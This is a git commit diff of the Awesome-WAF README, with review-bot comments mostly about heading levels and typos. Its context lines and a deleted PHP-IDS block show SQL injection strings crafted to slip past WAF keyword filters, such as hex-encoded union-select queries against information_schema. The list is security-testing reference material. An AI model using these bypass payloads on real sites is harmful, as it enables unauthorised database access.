mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-25 15:39:21 -05:00
Update README.md
This commit is contained in:
parent
72469e0cb0
commit
f9a21ed5ba
30
README.md
@ -1337,10 +1337,10 @@ Wanna detect WAFs? Lets see how.
|
|||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
## Evasion Techniques
|
# Evasion Techniques
|
||||||
Lets look at some methods of bypassing and evading WAFs.
|
Lets look at some methods of bypassing and evading WAFs.
|
||||||
|
|
||||||
### Fuzzing/Bruteforcing:
|
## Fuzzing/Bruteforcing:
|
||||||
#### Method:
|
#### Method:
|
||||||
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
||||||
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
||||||
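Review bot: promoting `## Evasion Techniques` to `# Evasion Techniques` makes it a top-level heading, which in a README is normally reserved for the document title, and after `### Fuzzing/Bruteforcing:` becomes `## Fuzzing/Bruteforcing:` the `#### Method:` beneath it sits two levels down with no `###` in between. Suggest a consistent ladder such as `## Evasion Techniques` / `### Fuzzing/Bruteforcing` / `#### Method`, or demote `Method:` to match the new parent level. Since these lines are being touched, `Lets look at some methods` in the context should read `Let's look at some methods`, and the trailing colons on the headings (`Fuzzing/Bruteforcing:`, `Method:`) are unusual in Markdown headings and can be dropped.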
@ -1358,14 +1358,16 @@ __Drawback:__
|
|||||||
- This method often fails.
|
- This method often fails.
|
||||||
- Many a times your IP will be blocked (temporarily/permanently).
|
- Many a times your IP will be blocked (temporarily/permanently).
|
||||||
|
|
||||||
### Regex-Reversing:
|
## Regex-Reversing:
|
||||||
#### Method:
|
### Method:
|
||||||
- Most efficient method of bypassing WAFs.
|
- Most efficient method of bypassing WAFs.
|
||||||
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
|
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
|
||||||
- Payload matches the reg-ex the WAF triggers alarm.
|
- Payload matches the reg-ex the WAF triggers alarm.
|
||||||
|
|
||||||
#### Techniques:
|
#### Techniques:
|
||||||
|
|
||||||
|
__Scenario 1: SQL Injection__
|
||||||
|
|
||||||
##### • Step 1:
|
##### • Step 1:
|
||||||
__Keyword filer__: `and`, `or`, `union`
|
__Keyword filer__: `and`, `or`, `union`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
||||||
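Review bot: `#### Method:` is promoted to `### Method:` but the sibling `#### Techniques:` in the same Regex-Reversing section is left at `####`, so two subsections of equal rank now render at different levels; raise `Techniques:` to `###` as well and adjust `##### • Step 1:` beneath it accordingly. The newly added `__Scenario 1: SQL Injection__` is bold text rather than a heading, so it will not appear in any generated table of contents; if scenarios are meant to be navigable, a heading at the next level down would fit the surrounding structure better. While this region is being edited, `Keyword filer` in the unchanged context is a typo for `Keyword filter`, and `Payload matches the reg-ex the WAF triggers alarm` needs an `If` or `When` at the start to read as a sentence.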
@ -1423,24 +1425,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
|
|||||||
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
||||||
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
|
|
||||||
|
|
||||||
#### Scenario 1:
|
|
||||||
- __Filtered Injection__: `1 or 1 = 1`
|
|
||||||
- __Bypassed Injection__: `1 or 1`
|
|
||||||
|
|
||||||
#### Scenario 2:
|
|
||||||
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
|
|
||||||
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
|
|
||||||
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
|
|
||||||
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
|
|
||||||
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
|
|
||||||
|
|
||||||
__Drawbacks:__
|
|
||||||
- This method is time consuming.
|
|
||||||
|
|
||||||
## Google Dorks Approach:
|
## Google Dorks Approach:
|
||||||
|
|
||||||
## Known Bypasses:
|
## Known Bypasses:
|
||||||
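Review bot: this hunk deletes the entire PHP-IDS block (the explanatory paragraph, both scenarios with the `between 0x61 and 0x7a` and `like 0x7573657273` variants) together with the `__Drawbacks:__` list for Regex-Reversing, so that section no longer states its drawback (`This method is time consuming`) while Fuzzing/Bruteforcing keeps its own `__Drawback:__` list. The commit message `Update README.md` does not say whether this material is being dropped or relocated; if relocated, the destination should appear in the same commit so the README does not lose the content in between, and if dropped, keeping at least the `__Drawbacks:__` subsection preserves the parallel structure used by the other evasion methods.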
@ -1649,4 +1633,4 @@ whatwaf -u <target> --ra --throttle 2
|
|||||||
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
||||||
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
||||||
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
||||||
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
||||||
|
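Review bot: the four presentation lines in this hunk are character-for-character identical on both sides as displayed, so the change is invisible here and is most likely trailing whitespace or a line-ending difference; confirm with `git diff -w` or `git diff --ignore-space-at-eol`, and if it is only whitespace noise consider leaving these lines out of the commit so `git blame` is not disturbed. Since the lines are being rewritten anyway, `A presentation at about efficiently evading WAFs` should read `A presentation about efficiently evading WAFs`.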